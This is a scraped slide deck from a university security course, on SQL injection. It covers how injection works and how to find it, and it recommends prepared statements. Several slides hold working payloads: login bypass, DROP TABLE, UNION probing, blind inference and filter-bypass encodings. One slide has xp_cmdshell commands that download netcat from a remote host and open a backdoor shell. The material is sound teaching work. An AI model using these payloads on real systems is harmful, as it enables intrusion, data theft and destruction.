KEMBAR78
Chapter 14 sql injection | PDF
Uploaded bynewbie2019
372 views

Chapter 14 sql injection

This document discusses SQL injection attacks and how to mitigate them. It begins by defining injection attacks as tricks that cause an application to unintentionally include commands in user-submitted data. It then explains how SQL injection works by having the attacker submit malicious SQL code in a web form. The document outlines several examples of SQL injection attacks, such as unauthorized access, database modification, and denial of service. It discusses techniques for finding and exploiting SQL injection vulnerabilities. Finally, it recommends effective mitigation strategies like prepared statements and input whitelisting to protect against SQL injection attacks.

Download to read offline
INFORMATION SYSTEM SECURITY Jupriyadi, S.Kom. M.T. jupriyadi@teknokrat.ac.id Chapter 14
Topics 1. What are injection attacks? 2. How SQL Injection Works 3. Exploiting SQL Injection Bugs 4. Mitigating SQL Injection 5. Other Injection Attacks
Injection • Injection attacks trick an application into including unintended commands in the data send to an interpreter. • Interpreters – Interpret strings as commands. – Ex: SQL, shell (cmd.exe, bash), LDAP, XPath • Key Idea – Input data from the application is executed as code by the interpreter.
SQL Injection 1. App sends form to user. 2. Attacker submits form with SQL exploit data. 3. Application builds string with exploit data. 4. Application sends SQL query to DB. 5. DB executes query, including exploit, sends data back to application. 6. Application returns data to user. Web Server Attacker DB Server Firewall User Pass ‘ or 1=1-- Form
SQL Injection in PHP $link = mysql_connect($DB_HOST, $DB_USERNAME, $DB_PASSWORD) or die ("Couldn't connect: " . mysql_error()); mysql_select_db($DB_DATABASE); $query = "select count(*) from users where username = '$username' and password = '$password‘ "; $result = mysql_query($query);
SQL Injection Attack #1 Unauthorized Access Attempt: password = ’ or 1=1 -- SQL statement becomes: select count(*) from users where username = ‘user’ and password = ‘’ or 1=1 -- Checks if password is empty OR 1=1, which is always true, permitting access.
SQL Injection Attack #2 Database Modification Attack: password = foo’; delete from table users where username like ‘% DB executes two SQL statements: select count(*) from users where username = ‘user’ and password = ‘foo’ delete from table users where username like ‘%’
Exploits of a Mom
Finding SQL Injection Bugs 1. Submit a single quote as input. If an error results, app is vulnerable. If no error, check for any output changes. 2. Submit two single quotes. Databases use ’’ to represent literal ’ If error disappears, app is vulnerable. 3. Try string or numeric operators.  Oracle: ’||’FOO  MS-SQL: ‘+’FOO  MySQL: ’ ’FOO  2-2  81+19  49-ASCII(1)
Injecting into SELECT Most common SQL entry point. SELECT columns FROM table WHERE expression ORDER BY expression Places where user input is inserted: WHERE expression ORDER BY expression Table or column names
Injecting into INSERT Creates a new data row in a table. INSERT INTO table (col1, col2, ...) VALUES (val1, val2, ...) Requirements Number of values must match # columns. Types of values must match column types. Technique: add values until no error. foo’)-- foo’, 1)-- foo’, 1, 1)--
Injecting into UPDATE Modifies one or more rows of data. UPDATE table SET col1=val1, col2=val2, ... WHERE expression Places where input is inserted SET clause WHERE clause Be careful with WHERE clause ’ OR 1=1 will change all rows
UNION Combines SELECTs into one result. SELECT cols FROM table WHERE expr UNION SELECT cols2 FROM table2 WHERE expr2 Allows attacker to read any table foo’ UNION SELECT number FROM cc-- Requirements Results must have same number and type of cols. Attacker needs to know name of other table. DB returns results with column names of 1st query.
UNION Finding #columns with NULL ‘ UNION SELECT NULL-- ‘ UNION SELECT NULL, NULL-- ‘ UNION SELECT NULL, NULL, NULL-- Finding #columns with ORDER BY ‘ ORDER BY 1-- ‘ ORDER BY 2-- ‘ ORDER BY 3-- Finding a string column to extract data ‘ UNION SELECT ‘a’, NULL, NULL— ‘ UNION SELECT NULL, ‘a’, NULL-- ‘ UNION SELECT NULL, NULL, ‘a’--
Inference Attacks Problem: What if app doesn’t print data? Injection can produce detectable behavior Successful or failed web page. Noticeable time delay or absence of delay. Identify an exploitable URL http://site/blog?message=5 AND 1=1 http://site/blog?message=5 AND 1=2 Use condition to identify one piece of data (SUBSTRING(SELECT TOP 1 number FROM cc), 1, 1) = 1 (SUBSTRING(SELECT TOP 1 number FROM cc), 1, 1) = 2 ... or use binary search technique ... (SUBSTRING(SELECT TOP 1 number FROM cc), 1, 1) > 5
More Examples (1) • Application authentication bypass using SQL injection. • Suppose a web form takes userID and password as input. • The application receives a user ID and a password and authenticate the user by checking the existence of the user in the USER table and matching the data in the PWD column. • Assume that the application is not validating what the user types into these two fields and the SQL statement is created by string concatenation.
More Example (2) • The following code could be an example of such bad practice: sqlString = “select USERID from USER where USERID = `” & userId & “` and PWD = `” & pwd & “`” result = GetQueryResult(sqlString) If(result = “”) then userHasBeenAuthenticated = False Else userHasBeenAuthenticated = True End If
More Example (3) • User ID: ` OR ``=` • Password: `OR ``=` • In this case the sqlString used to create the result set would be as follows: select USERID from USER where USERID = ``OR``=``and PWD = `` OR``=`` select USERID from USER where USERID = ``OR``=``and PWD = `` OR``=`` TRUE TRUE • Which would certainly set the userHasBenAuthenticated variable to true.
More Example (4) User ID: ` OR ``=`` -- Password: abc Because anything after the -- will be ignore, the injection will work even without any specific injection into the password predicate.
More Example (5) User ID: ` ; DROP TABLE USER ; -- Password: `OR ``=` select USERID from USER where USERID = `` ; DROP TABLE USER ; -- ` and PWD = ``OR ``=`` I will not try to get any information, I just wan to bring the application down.
Beyond Data Retrieval Microsoft's SQL Server supports a stored procedure xp_cmdshell that permits what amounts to arbitrary command execution, and if this is permitted to the web user, complete compromise of the webserver is inevitable. What we had done so far was limited to the web application and the underlying database, but if we can run commands, the webserver itself cannot help but be compromised. Access to xp_cmdshell is usually limited to administrative accounts, but it's possible to grant it to lesser users. With the UTL_TCP package and its procedures and functions, PL/SQL applications can communicate with external TCP/IP-based servers using TCP/IP. Because many Internet application protocols are based on TCP/IP, this package is useful to PL/SQL applications that use Internet protocols and e-mail.
Beyond Data Retrieval Downloading Files exec master..xp_cmdshell ‘tftp 192.168.1.1 GET nc.exe c:nc.exe’ Backdoor with Netcat exec master..xp_cmdshell ‘nc.exe -e cmd.exe -l -p 53’ Direct Backdoor w/o External Cmds UTL_TCP.OPEN_CONNECTION('192.168.0.1', 2222, 1521) //charset: 1521 //port: 2222 //host: 192.168.0.1
Impact of SQL Injection 1. Leakage of sensitive information. 2. Reputation decline. 3. Modification of sensitive information. 4. Loss of control of db server. 5. Data loss. 6. Denial of service.
The Cause: String Building Building a SQL command string with user input in any language is dangerous. • Variable interpolation. • String concatenation with variables. • String format functions like sprintf(). • String templating with variable replacement.
Mitigating SQL Injection Ineffective Mitigations Blacklists Stored Procedures Partially Effective Mitigations Whitelists Prepared Queries
Blacklists Filter out or Sanitize known bad SQL meta-characters, such as single quotes. Problems: 1. Numeric parameters don’t use quotes. 2. URL escaped metacharacters. 3. Unicode encoded metacharacters. 4. Did you miss any metacharacters? Though it's easy to point out some dangerous characters, it's harder to point to all of them.
Bypassing Filters Different case SeLecT instead of SELECT or select Bypass keyword removal filters SELSELECTECT URL-encoding %53%45%4C%45%43%54 SQL comments SELECT/*foo*/num/*foo*/FROM/**/cc SEL/*foo*/ECT String Building ‘us’||’er’ chr(117)||chr(115)||chr(101)||chr(114)
Stored Procedures Stored Procedures build strings too: CREATE PROCEDURE dbo.doQuery(@id nchar(128)) AS DECLARE @query nchar(256) SELECT @query = ‘SELECT cc FROM cust WHERE id=‘’’ + @id + ‘’’’ EXEC @query RETURN it's always possible to write a stored procedure that itself constructs a query dynamically: this provides no protection against SQL Injection. It's only proper binding with prepare/execute or direct SQL statements with bound variables that provide protection.
Whitelist Reject input that doesn’t match your list of safe characters to accept. – Identify what is good, not what is bad. – Reject input instead of attempting to repair. – Still have to deal with single quotes when required, such as in names.
Prepared Queries  bound parameters, which are supported by essentially all database programming interfaces. In this technique, an SQL statement string is created with placeholders - a question mark for each parameter - and it's compiled ("prepared", in SQL parlance) into an internal form. Later, this prepared query is "executed" with a list of parameters. Example in Perl: $sth = $dbh->prepare("SELECT email, userid FROM members WHERE email = ?;"); $sth->execute($email); $email is the data obtained from the user's form, and it is passed as positional parameter #1 (the first question mark), and at no point do the contents of this variable have anything to do with SQL statement parsing. Quotes, semicolons, backslashes, SQL comment notation - none of this has any impact, because it's "just data". There simply is nothing to subvert, so the application is be largely immune to SQL injection attacks.
Prepared Queries  bound parameters in Java Insecure version Statement s = connection.createStatement(); ResultSet rs = s.executeQuery("SELECT email FROM member WHERE name = " + formField); // *boom* Secure version PreparedStatement ps = connection.prepareStatement( "SELECT email FROM member WHERE name = ?"); ps.setString(1, formField); ResultSet rs = ps.executeQuery(); There also may be some performance benefits if this prepared query is reused multiple times (it only has to be parsed once), but this is minor compared to the enormous security benefits. This is probably the single most important step one can take to secure a web application.
References: http://devzone.zend.com/article/686 http://unixwiz.net/techtips/sql-injection.html <?php $mysqli = new mysqli('localhost', 'user', 'password', 'world'); /* check connection */ if (mysqli_connect_errno()) { printf("Connect failed: %sn", mysqli_connect_error()); exit(); } $stmt = $mysqli->prepare("INSERT INTO CountryLanguage VALUES (?, ?, ?, ?)"); $stmt->bind_param('sssd', $code, $language, $official, $percent); // ‘sssd’ specifies format $code = 'DEU'; $language = 'Bavarian'; $official = "F"; $percent = 11.2; /* execute prepared statement */ $stmt->execute(); printf("%d Row inserted.n", $stmt->affected_rows); /* close statement and connection */ $stmt->close(); /* Clean up table CountryLanguage */ $mysqli->query("DELETE FROM CountryLanguage WHERE Language='Bavarian'"); printf("%d Row deleted.n", $mysqli->affected_rows); /* close connection */ $mysqli->close(); ?> Prepared Queries
Other Injection Types • Shell injection. • Scripting language injection. • File inclusion. • XML injection. • XPath injection. • LDAP injection. • SMTP injection.
SQL injection Conclusion • SQL injection is technique for exploiting applications that use relational databases as their back end. • Applications compose SQL statements and send to database. • SQL injection use the fact that many of these applications concatenate the fixed part of SQL statement with user-supplied data that forms WHERE predicates or additional sub-queries.
SQL injection Conclusion  The technique is based on malformed user- supplied data  Transform the innocent SQL calls to a malicious call  Cause unauthorized access, deletion of data, or theft of information  All databases can be a target of SQL injection and all are vulnerable to this technique.  The vulnerability is in the application layer outside of the database, and the moment that the application has a connection into the database.
Project 7: Due on April 25 • Visit the website for information about webGoat: http://www.irongeek.com/i.php?page=videos/webgoat-sql-injection • Read WebGoad User and Install Guide http://www.owasp.org/index.php/Category:OWASP_WebGoat_Project • Install WebGoat and play with SQL injection.
References 1. Andres Andreu, Professional Pen Testing for Web Applications, Wrox, 2006. 2. Chris Anley, “Advanced SQL Injection In SQL Server Applications,” http://www.nextgenss.com/papers/advanced_sql_injection.pdf, 2002. 3. Stephen J. Friedl, “SQL Injection Attacks by Example,” http://www.unixwiz.net/techtips/sql- injection.html, 2005. 4. Ferruh Mavituna, SQL Injection Cheat Sheet, http://ferruh.mavituna.com/sql-injection- cheatsheet-oku 5. J.D. Meier, et. al., Improving Web Application Security: Threats and Countermeasures, Microsoft, http://msdn2.microsoft.com/en-us/library/aa302418.aspx, 2006. 6. Randall Munroe, XKCD, http://xkcd.com/327/ 7. OWASP, OWASP Testing Guide v2, http://www.owasp.org/index.php/Testing_for_SQL_Injection, 2007. 8. Joel Scambray, Mike Shema, and Caleb Sima, Hacking Exposed: Web Applications, 2nd edition, Addison-Wesley, 2006. 9. SEMS, “SQL Injection used to hack Real Estate Web Sites,” http://www.semspot.com/2007/12/19/sql-injection-used-to-hack-real-estate-websites- extreme-blackhat/, 2007. 10. Chris Shiflett, Essential PHP Security, O’Reilly, 2005. 11. SK, “SQL Injection Walkthrough,” http://www.securiteam.com/securityreviews/5DP0N1P76E.html, 2002. 12. SPI Labs, “Blind SQL Injection,” http://sqlinjection.com/assets/documents/Blind_SQLInjection.pdf, 2007. 13. Dafydd Stuttard and Marcus Pinto, Web Application Hacker’s Handbook, Wiley, 2007. 14. WASC, “Web Application Incidents Annual Report 2007,” https://bsn.breach.com/downloads/whid/The%20Web%20Hacking%20Incidents%20Datab ase%20Annual%20Report%202007.pdf, 2008.
What's Next ?
39

More Related Content

PPTX
SQL INJECTION
byAnoop T
 
PDF
Time-Based Blind SQL Injection Using Heavy Queries
byChema Alonso
 
PPT
Writing Secure Code – Threat Defense
byamiable_indian
 
PPT
Time-Based Blind SQL Injection using Heavy Queries
byChema Alonso
 
PPTX
Time-Based Blind SQL Injection
bymatt_presson
 
PDF
Sql Injection - Vulnerability and Security
bySandip Chaudhari
 
PPTX
Connection String Parameter Pollution Attacks
byChema Alonso
 
PPT
Sql injection
byPallavi Biswas
 
SQL INJECTION
byAnoop T
 
Time-Based Blind SQL Injection Using Heavy Queries
byChema Alonso
 
Writing Secure Code – Threat Defense
byamiable_indian
 
Time-Based Blind SQL Injection using Heavy Queries
byChema Alonso
 
Time-Based Blind SQL Injection
bymatt_presson
 
Sql Injection - Vulnerability and Security
bySandip Chaudhari
 
Connection String Parameter Pollution Attacks
byChema Alonso
 
Sql injection
byPallavi Biswas
 

What's hot

PDF
SQL Injection
byAbhinav Nair
 
DOCX
Types of sql injection attacks
byRespa Peter
 
PPTX
Secure programming with php
byMohmad Feroz
 
PDF
Sql injection
bySafwan Hashmi
 
PPT
Advanced Topics On Sql Injection Protection
byamiable_indian
 
PPTX
SQL Injection Attacks cs586
byStacy Watts
 
PDF
Prevention of SQL Injection Attack in Web Application with Host Language
byIRJET Journal
 
PPT
Hackers Paradise SQL Injection Attacks
byamiable_indian
 
PPTX
Web Security: SQL Injection
byVortana Say
 
PPTX
SQL Injection
byAsish Kumar Rath
 
PPTX
Sql injection
byNuruzzaman Milon
 
PDF
Think Like a Hacker - Database Attack Vectors
byMark Ginnebaugh
 
PPTX
Sql injections - with example
byPrateek Chauhan
 
PPTX
SQL injection prevention techniques
bySongchaiDuangpan
 
PDF
SQL Injection Tutorial
byMagno Logan
 
PPTX
Sql injection
bySasha-Leigh Garret
 
PPT
Web application attacks using Sql injection and countermasures
byCade Zvavanjanja
 
PDF
Sql Injection and XSS
byMike Crabb
 
PPTX
Sql injection
byZidh
 
PDF
How to identify and prevent SQL injection
byEguardian Global Services
 
SQL Injection
byAbhinav Nair
 
Types of sql injection attacks
byRespa Peter
 
Secure programming with php
byMohmad Feroz
 
Sql injection
bySafwan Hashmi
 
Advanced Topics On Sql Injection Protection
byamiable_indian
 
SQL Injection Attacks cs586
byStacy Watts
 
Prevention of SQL Injection Attack in Web Application with Host Language
byIRJET Journal
 
Hackers Paradise SQL Injection Attacks
byamiable_indian
 
Web Security: SQL Injection
byVortana Say
 
SQL Injection
byAsish Kumar Rath
 
Sql injection
byNuruzzaman Milon
 
Think Like a Hacker - Database Attack Vectors
byMark Ginnebaugh
 
Sql injections - with example
byPrateek Chauhan
 
SQL injection prevention techniques
bySongchaiDuangpan
 
SQL Injection Tutorial
byMagno Logan
 
Sql injection
bySasha-Leigh Garret
 
Web application attacks using Sql injection and countermasures
byCade Zvavanjanja
 
Sql Injection and XSS
byMike Crabb
 
Sql injection
byZidh
 
How to identify and prevent SQL injection
byEguardian Global Services
 

Similar to Chapter 14 sql injection

PPT
Sql injection
byNitish Kumar
 
PPT
Sql injection
byNikunj Dhameliya
 
PPTX
Sql injection
byMehul Boghra
 
PDF
Sq linjection
byMahesh Gupta (DBATAG) - SQL Server Consultant
 
PPT
PHP - Introduction to Advanced SQL
byVibrant Technologies & Computers
 
PDF
CNIT 129S: 9: Attacking Data Stores (Part 2 of 2)
bySam Bowne
 
PPT
Sql Injection Adv Owasp
byAung Khant
 
PPT
Advanced SQL Injection
byamiable_indian
 
PDF
CNIT 129S Ch 9: Attacking Data Stores (Part 2 of 2)
bySam Bowne
 
PDF
Ch 9 Attacking Data Stores (Part 2)
bySam Bowne
 
PPTX
03. sql and other injection module v17
byEoin Keary
 
PDF
sql-inj_attack.pdf
byssuser07cf8b
 
PPTX
SQL Injection Sql Injection Typesagdsgdsgdsgbdshfdshbfdshbfdshbfdhsh
byRAKIBULISLAM529074
 
PPSX
Web application security
bywww.netgains.org
 
PDF
SQL INJECTIONS EVERY TESTER NEEDS TO KNOW
byVladimir Arutin
 
PDF
Blind sql injection
byKagi Adrian Zinelli
 
PDF
Blind sql injection
byKagi Adrian Zinelli
 
PPTX
Sql injection
byHemendra Kumar
 
PDF
SQL Injection
byMagno Logan
 
PPT
SQL injection and buffer overflows are hacking techniques used to exploit wea...
bybankservicehyd
 
Sql injection
byNitish Kumar
 
Sql injection
byNikunj Dhameliya
 
Sql injection
byMehul Boghra
 
Sq linjection
byMahesh Gupta (DBATAG) - SQL Server Consultant
 
PHP - Introduction to Advanced SQL
byVibrant Technologies & Computers
 
CNIT 129S: 9: Attacking Data Stores (Part 2 of 2)
bySam Bowne
 
Sql Injection Adv Owasp
byAung Khant
 
Advanced SQL Injection
byamiable_indian
 
CNIT 129S Ch 9: Attacking Data Stores (Part 2 of 2)
bySam Bowne
 
Ch 9 Attacking Data Stores (Part 2)
bySam Bowne
 
03. sql and other injection module v17
byEoin Keary
 
sql-inj_attack.pdf
byssuser07cf8b
 
SQL Injection Sql Injection Typesagdsgdsgdsgbdshfdshbfdshbfdshbfdhsh
byRAKIBULISLAM529074
 
Web application security
bywww.netgains.org
 
SQL INJECTIONS EVERY TESTER NEEDS TO KNOW
byVladimir Arutin
 
Blind sql injection
byKagi Adrian Zinelli
 
Blind sql injection
byKagi Adrian Zinelli
 
Sql injection
byHemendra Kumar
 
SQL Injection
byMagno Logan
 
SQL injection and buffer overflows are hacking techniques used to exploit wea...
bybankservicehyd
 

More from newbie2019

PDF
Digital forensic principles and procedure
bynewbie2019
 
PDF
Fundamental digital forensik
bynewbie2019
 
PDF
Pendahuluan it forensik
bynewbie2019
 
PDF
Chapter 15 incident handling
bynewbie2019
 
PDF
Chapter 13 web security
bynewbie2019
 
PDF
NIST Framework for Information System
bynewbie2019
 
PDF
Nist.sp.800 37r2
bynewbie2019
 
PDF
Chapter 12 iso 27001 awareness
bynewbie2019
 
PDF
Chapter 10 security standart
bynewbie2019
 
PDF
Chapter 8 cryptography lanjutan
bynewbie2019
 
PDF
Pertemuan 7 cryptography
bynewbie2019
 
PDF
Chapter 6 information hiding (steganography)
bynewbie2019
 
PDF
Vulnerability threat and attack
bynewbie2019
 
PDF
Chapter 4 vulnerability threat and attack
bynewbie2019
 
PDF
C02
bynewbie2019
 
PDF
Chapter 3 security principals
bynewbie2019
 
PDF
Chapter 2 konsep dasar keamanan
bynewbie2019
 
PDF
Fundamentals of information systems security ( pdf drive ) chapter 1
bynewbie2019
 
PDF
Chapter 1 introduction
bynewbie2019
 
PDF
CCNA RSE Routing concept
bynewbie2019
 
Digital forensic principles and procedure
bynewbie2019
 
Fundamental digital forensik
bynewbie2019
 
Pendahuluan it forensik
bynewbie2019
 
Chapter 15 incident handling
bynewbie2019
 
Chapter 13 web security
bynewbie2019
 
NIST Framework for Information System
bynewbie2019
 
Nist.sp.800 37r2
bynewbie2019
 
Chapter 12 iso 27001 awareness
bynewbie2019
 
Chapter 10 security standart
bynewbie2019
 
Chapter 8 cryptography lanjutan
bynewbie2019
 
Pertemuan 7 cryptography
bynewbie2019
 
Chapter 6 information hiding (steganography)
bynewbie2019
 
Vulnerability threat and attack
bynewbie2019
 
Chapter 4 vulnerability threat and attack
bynewbie2019
 
C02
bynewbie2019
 
Chapter 3 security principals
bynewbie2019
 
Chapter 2 konsep dasar keamanan
bynewbie2019
 
Fundamentals of information systems security ( pdf drive ) chapter 1
bynewbie2019
 
Chapter 1 introduction
bynewbie2019
 
CCNA RSE Routing concept
bynewbie2019
 

Recently uploaded

PPTX
Agriculture Lesson Note for Grade 11 Chapter 3 & 4.pptx
byNajibMuhidin
 
PPTX
Basics for Conducting Bibliometric Analysis - Dr Ahsan Riaz
bySystematic Reviews Network (SRN)
 
PDF
Slit lamp parts 2/ppt/notes/download.pdf
byAnmol Singh
 
PPTX
Project Dashboard in Odoo 18 Project
byCeline George
 
PPTX
Classification and Applied Aspects of Joints.pptx
byMathew Joseph
 
PDF
Phase Equilibria and Colligative Properties.pdf
byMithil Fal Desai
 
PPTX
English Home Language & First Additional Language P2 Preparation.pptx
byMasingita Maswanganye
 
PDF
TUYỂN CHỌN 30 ĐỀ THI CHỌN HỌC SINH GIỎI LỚP 9 CÁC TỈNH NĂM 2024-2025 MÔN TIẾN...
byNguyen Thanh Tu Collection
 
PDF
History of Department of AIHC and Archaeology_BHU
byBanaras Hindu University
 
PPTX
ILA 2025 Prague CLS Presentation of Leadership journal
byjohanalvehus
 
PDF
BUSINESS ETHICS – UNIT I: Introduction to Business Ethics
byD NANEE
 
PDF
Unofficial Draft by Simanchala Sarab: #GNDU #B.A. B.Ed. (#ITEP) #Pre-Interns...
bySimanchala Sarab, BABed(ITEP Secondary stage) in History student at GNDU Amritsar
 
PPTX
Safety Needs and Prevention of environmental hazards.pptx
byAneetaSharma15
 
PPTX
THERAPEUTIC ENVIORNMENT.............pptx
byAneetaSharma15
 
PDF
The Minority Caucus in Parliament has called on government to take immediate ...
bynservice241
 
PPTX
Welcome to our Open Evening 2025 Ballinrobe CS
byjacollins1515
 
PDF
BUSINESS ETHICS – UNIT V: Ethical Insights from Thirukkural and Modern Thought
byD NANEE
 
DOCX
Extension Education: From theory to practice by Dr Subin K Mohan.docx
byDrSubinKMohan
 
PPTX
psychoanalytic Theory.pptx, MSc. Nursing
byKomalJaiswal46
 
PDF
1.1 Historical background & development of Profession of Pharmacy.pdf
byMr. SAKHARE R. S.
 
Agriculture Lesson Note for Grade 11 Chapter 3 & 4.pptx
byNajibMuhidin
 
Basics for Conducting Bibliometric Analysis - Dr Ahsan Riaz
bySystematic Reviews Network (SRN)
 
Slit lamp parts 2/ppt/notes/download.pdf
byAnmol Singh
 
Project Dashboard in Odoo 18 Project
byCeline George
 
Classification and Applied Aspects of Joints.pptx
byMathew Joseph
 
Phase Equilibria and Colligative Properties.pdf
byMithil Fal Desai
 
English Home Language & First Additional Language P2 Preparation.pptx
byMasingita Maswanganye
 
TUYỂN CHỌN 30 ĐỀ THI CHỌN HỌC SINH GIỎI LỚP 9 CÁC TỈNH NĂM 2024-2025 MÔN TIẾN...
byNguyen Thanh Tu Collection
 
History of Department of AIHC and Archaeology_BHU
byBanaras Hindu University
 
ILA 2025 Prague CLS Presentation of Leadership journal
byjohanalvehus
 
BUSINESS ETHICS – UNIT I: Introduction to Business Ethics
byD NANEE
 
Unofficial Draft by Simanchala Sarab: #GNDU #B.A. B.Ed. (#ITEP) #Pre-Interns...
bySimanchala Sarab, BABed(ITEP Secondary stage) in History student at GNDU Amritsar
 
Safety Needs and Prevention of environmental hazards.pptx
byAneetaSharma15
 
THERAPEUTIC ENVIORNMENT.............pptx
byAneetaSharma15
 
The Minority Caucus in Parliament has called on government to take immediate ...
bynservice241
 
Welcome to our Open Evening 2025 Ballinrobe CS
byjacollins1515
 
BUSINESS ETHICS – UNIT V: Ethical Insights from Thirukkural and Modern Thought
byD NANEE
 
Extension Education: From theory to practice by Dr Subin K Mohan.docx
byDrSubinKMohan
 
psychoanalytic Theory.pptx, MSc. Nursing
byKomalJaiswal46
 
1.1 Historical background & development of Profession of Pharmacy.pdf
byMr. SAKHARE R. S.
 

Chapter 14 sql injection

  • 1.
    INFORMATION SYSTEM SECURITY Jupriyadi, S.Kom.M.T. jupriyadi@teknokrat.ac.id Chapter 14
  • 2.
    Topics 1. What areinjection attacks? 2. How SQL Injection Works 3. Exploiting SQL Injection Bugs 4. Mitigating SQL Injection 5. Other Injection Attacks
  • 3.
    Injection • Injection attackstrick an application into including unintended commands in the data send to an interpreter. • Interpreters – Interpret strings as commands. – Ex: SQL, shell (cmd.exe, bash), LDAP, XPath • Key Idea – Input data from the application is executed as code by the interpreter.
  • 4.
    SQL Injection 1. Appsends form to user. 2. Attacker submits form with SQL exploit data. 3. Application builds string with exploit data. 4. Application sends SQL query to DB. 5. DB executes query, including exploit, sends data back to application. 6. Application returns data to user. Web Server Attacker DB Server Firewall User Pass ‘ or 1=1-- Form
  • 5.
    SQL Injection inPHP $link = mysql_connect($DB_HOST, $DB_USERNAME, $DB_PASSWORD) or die ("Couldn't connect: " . mysql_error()); mysql_select_db($DB_DATABASE); $query = "select count(*) from users where username = '$username' and password = '$password‘ "; $result = mysql_query($query);
  • 6.
    SQL Injection Attack#1 Unauthorized Access Attempt: password = ’ or 1=1 -- SQL statement becomes: select count(*) from users where username = ‘user’ and password = ‘’ or 1=1 -- Checks if password is empty OR 1=1, which is always true, permitting access.
  • 7.
    SQL Injection Attack#2 Database Modification Attack: password = foo’; delete from table users where username like ‘% DB executes two SQL statements: select count(*) from users where username = ‘user’ and password = ‘foo’ delete from table users where username like ‘%’
  • 8.
  • 9.
    Finding SQL InjectionBugs 1. Submit a single quote as input. If an error results, app is vulnerable. If no error, check for any output changes. 2. Submit two single quotes. Databases use ’’ to represent literal ’ If error disappears, app is vulnerable. 3. Try string or numeric operators.  Oracle: ’||’FOO  MS-SQL: ‘+’FOO  MySQL: ’ ’FOO  2-2  81+19  49-ASCII(1)
  • 10.
    Injecting into SELECT Mostcommon SQL entry point. SELECT columns FROM table WHERE expression ORDER BY expression Places where user input is inserted: WHERE expression ORDER BY expression Table or column names
  • 11.
    Injecting into INSERT Createsa new data row in a table. INSERT INTO table (col1, col2, ...) VALUES (val1, val2, ...) Requirements Number of values must match # columns. Types of values must match column types. Technique: add values until no error. foo’)-- foo’, 1)-- foo’, 1, 1)--
  • 12.
    Injecting into UPDATE Modifiesone or more rows of data. UPDATE table SET col1=val1, col2=val2, ... WHERE expression Places where input is inserted SET clause WHERE clause Be careful with WHERE clause ’ OR 1=1 will change all rows
  • 13.
    UNION Combines SELECTs intoone result. SELECT cols FROM table WHERE expr UNION SELECT cols2 FROM table2 WHERE expr2 Allows attacker to read any table foo’ UNION SELECT number FROM cc-- Requirements Results must have same number and type of cols. Attacker needs to know name of other table. DB returns results with column names of 1st query.
  • 14.
    UNION Finding #columns withNULL ‘ UNION SELECT NULL-- ‘ UNION SELECT NULL, NULL-- ‘ UNION SELECT NULL, NULL, NULL-- Finding #columns with ORDER BY ‘ ORDER BY 1-- ‘ ORDER BY 2-- ‘ ORDER BY 3-- Finding a string column to extract data ‘ UNION SELECT ‘a’, NULL, NULL— ‘ UNION SELECT NULL, ‘a’, NULL-- ‘ UNION SELECT NULL, NULL, ‘a’--
  • 15.
    Inference Attacks Problem: Whatif app doesn’t print data? Injection can produce detectable behavior Successful or failed web page. Noticeable time delay or absence of delay. Identify an exploitable URL http://site/blog?message=5 AND 1=1 http://site/blog?message=5 AND 1=2 Use condition to identify one piece of data (SUBSTRING(SELECT TOP 1 number FROM cc), 1, 1) = 1 (SUBSTRING(SELECT TOP 1 number FROM cc), 1, 1) = 2 ... or use binary search technique ... (SUBSTRING(SELECT TOP 1 number FROM cc), 1, 1) > 5
  • 16.
    More Examples (1) •Application authentication bypass using SQL injection. • Suppose a web form takes userID and password as input. • The application receives a user ID and a password and authenticate the user by checking the existence of the user in the USER table and matching the data in the PWD column. • Assume that the application is not validating what the user types into these two fields and the SQL statement is created by string concatenation.
  • 17.
    More Example (2) •The following code could be an example of such bad practice: sqlString = “select USERID from USER where USERID = `” & userId & “` and PWD = `” & pwd & “`” result = GetQueryResult(sqlString) If(result = “”) then userHasBeenAuthenticated = False Else userHasBeenAuthenticated = True End If
  • 18.
    More Example (3) •User ID: ` OR ``=` • Password: `OR ``=` • In this case the sqlString used to create the result set would be as follows: select USERID from USER where USERID = ``OR``=``and PWD = `` OR``=`` select USERID from USER where USERID = ``OR``=``and PWD = `` OR``=`` TRUE TRUE • Which would certainly set the userHasBenAuthenticated variable to true.
  • 19.
    More Example (4) UserID: ` OR ``=`` -- Password: abc Because anything after the -- will be ignore, the injection will work even without any specific injection into the password predicate.
  • 20.
    More Example (5) UserID: ` ; DROP TABLE USER ; -- Password: `OR ``=` select USERID from USER where USERID = `` ; DROP TABLE USER ; -- ` and PWD = ``OR ``=`` I will not try to get any information, I just wan to bring the application down.
  • 21.
    Beyond Data Retrieval Microsoft'sSQL Server supports a stored procedure xp_cmdshell that permits what amounts to arbitrary command execution, and if this is permitted to the web user, complete compromise of the webserver is inevitable. What we had done so far was limited to the web application and the underlying database, but if we can run commands, the webserver itself cannot help but be compromised. Access to xp_cmdshell is usually limited to administrative accounts, but it's possible to grant it to lesser users. With the UTL_TCP package and its procedures and functions, PL/SQL applications can communicate with external TCP/IP-based servers using TCP/IP. Because many Internet application protocols are based on TCP/IP, this package is useful to PL/SQL applications that use Internet protocols and e-mail.
  • 22.
    Beyond Data Retrieval DownloadingFiles exec master..xp_cmdshell ‘tftp 192.168.1.1 GET nc.exe c:nc.exe’ Backdoor with Netcat exec master..xp_cmdshell ‘nc.exe -e cmd.exe -l -p 53’ Direct Backdoor w/o External Cmds UTL_TCP.OPEN_CONNECTION('192.168.0.1', 2222, 1521) //charset: 1521 //port: 2222 //host: 192.168.0.1
  • 23.
    Impact of SQLInjection 1. Leakage of sensitive information. 2. Reputation decline. 3. Modification of sensitive information. 4. Loss of control of db server. 5. Data loss. 6. Denial of service.
  • 24.
    The Cause: StringBuilding Building a SQL command string with user input in any language is dangerous. • Variable interpolation. • String concatenation with variables. • String format functions like sprintf(). • String templating with variable replacement.
  • 25.
    Mitigating SQL Injection IneffectiveMitigations Blacklists Stored Procedures Partially Effective Mitigations Whitelists Prepared Queries
  • 26.
    Blacklists Filter out orSanitize known bad SQL meta-characters, such as single quotes. Problems: 1. Numeric parameters don’t use quotes. 2. URL escaped metacharacters. 3. Unicode encoded metacharacters. 4. Did you miss any metacharacters? Though it's easy to point out some dangerous characters, it's harder to point to all of them.
  • 27.
    Bypassing Filters Different case SeLecTinstead of SELECT or select Bypass keyword removal filters SELSELECTECT URL-encoding %53%45%4C%45%43%54 SQL comments SELECT/*foo*/num/*foo*/FROM/**/cc SEL/*foo*/ECT String Building ‘us’||’er’ chr(117)||chr(115)||chr(101)||chr(114)
  • 28.
